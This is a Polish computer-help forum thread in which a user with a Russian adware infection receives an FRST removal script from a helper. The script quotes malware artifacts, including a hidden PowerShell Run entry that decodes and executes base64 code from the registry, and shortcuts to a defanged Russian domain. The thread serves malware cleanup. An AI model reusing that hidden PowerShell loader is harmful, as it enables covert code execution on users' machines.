x-kom hosting

Rosyjski wirus, reklamy

godlo9888
utworzono
utworzono

Witam

Wczoraj zainfekowałem komputer, od razu pobrałem adwcleaner - niby coś znalazł, restart, niby wszystko dobrze, a tu po chwili na pulpicie tworzyły się jakieś rosyjskie skróty, w przeglądarce pornograficzne reklamy itd. Mam adblocka, nawet ten sobie nie radził z tym. To postanowiłem w trybie awaryjnym przeskanować adwcleanerem, znowu coś wykrył i usunął. Uruchomiłem normalnie system, co się okazało że nic nie dało, reklamy zostały. Pobrałem mbam, którym nie mogę przeskanować komputera bo w różnych momentach się skan "zawiesza", a jak chce coś zrobić to zostaje restart bo robi się czarny ekran ( w różnych momentach się zawiesza, raz autostart, raz jakiś $recyclebin plik). To postanowiłem pobrać combofix, ten sobie poradził z usunięciem wszystkiego, ale nadal zostały reklamy i po restarcie tworzą się rosyjskie zakładki w google chrome i puste reklamy, dosłownie wszędzie, bez wartości puste pola. Wstawiam logi z FRST:

i wczorajsze z adwcleaner (teraz skanowałem adw i nic nie wykrył)

 

FRST_24-06-2017 16.31.41.txt

Shortcut_24-06-2017 16.31.41.txt

Addition_24-06-2017 16.31.41.txt

AdwCleaner[C2].txt

Twój_Anioł_Stróż
komentarz
komentarz (edytowane)

Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

Cytuj

Task: {0059207F-9CD1-4ADC-A884-68D66903DBBF} - System32\Tasks\setupsk => C:\Users\Patryk\AppData\Roaming\setupsk\python\pythonw.exe <==== ATTENTION

Task: {17A7B73D-AB1F-4A66-A0B3-8406EE1ECC94} - System32\Tasks\MSI => C:\Users\Patryk\AppData\Roaming\Microsoft\msi.exe <==== ATTENTION
C:\Users\Patryk\AppData\Roaming\Microsoft\msi.exe
Task: {82935022-2481-46B5-9650-2DA2522EBE86} - System32\Tasks\setupsk_upd => C:\Users\Patryk\AppData\Roaming\SETUPS~1\python\pythonw.exe <==== ATTENTION
Task: {E3F1F1B6-F50D-4739-8628-FDF001C7D765} - System32\Tasks\ifgker => C:\Users\Patryk\AppData\Local\ifgker\ifgker.exe <==== ATTENTION
ShortcutWithArgument: C:\Users\Patryk\AppData\Local\Microsoft\Start Menu\Вoйти в Интeрнeт.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "hxxp://eqvizin.ru/?utm_source=startlink03&utm_content=9b9ecb220f7b11703ea6292fdcdcdf8b&utm_term=AFC5E2BCF3592201D03D3E0F4E590093&utm_d=20170623"
C:\Users\Patryk\AppData\Local\Microsoft\Start Menu\Вoйти в Интeрнeт.lnk
FirewallRules: [{7F71A92B-15D9-43EC-B23B-CA870D301ACC}] => (Allow) C:\Users\Patryk\AppData\Local\yc\Application\yc.exe
C:\Users\Patryk\AppData\Local\yc\Application\yc.exe
RemoveDirectory: C:\Users\Patryk\AppData\Roaming\setupsk
RemoveDirectory: C:\Users\Patryk\AppData\Local\ifgker
HKU\S-1-5-21-1816448667-2973422257-815294239-1000\...\Run: [{86581E94-8DF5-49C0-9996-75C40A4D2578}] => powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\XPHJACIUWZX').PBTOIV)));
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
GroupPolicy: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1816448667-2973422257-815294239-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
C:\Windows\Minidump\*.dmp
InternetURL: C:\Users\Patryk\Favorites\Links\Интернет.url -> URL: hxxp://eqvizin.ru/?utm_source=favorites03&utm_content=20c6bbe85a555deeed44597d29168907&utm_term=AFC5E2BCF3592201D03D3E0F4E590093&utm_d=20170623
C:\Users\Patryk\Favorites\Links\Интернет.url
EmptyTemp:


Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

Edytowane przez Twój_Anioł_Stróż
  • Dobra wypowiedź 1
godlo9888
komentarz
komentarz (edytowane)

Zrobiłem, wchodzę na yt i nadal to samo. Po kliknięcie tego ruskiego linku obok subskrybuj pobiera się jakiś plik o rozszerzeniu mp4.(wczoraj patrzyłem). Wstawiam screena: 

 

EDIT:

 

Reinstall chrome raczej pomógł, dzięki za pomoc!

 

 

1212.png

Edytowane przez godlo9888

Wciąż szukasz rozwiązania problemu? Napisz teraz na forum!

Możesz zadać pytanie bez konieczności rejestracji - wystarczy, że wypełnisz formularz.

×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Strona wykorzystuje pliki cookies w celu prawidłowego świadczenia usług i wygody użytkowników. Warunki przechowywania i dostępu do plików cookies możesz zmienić w ustawieniach przeglądarki.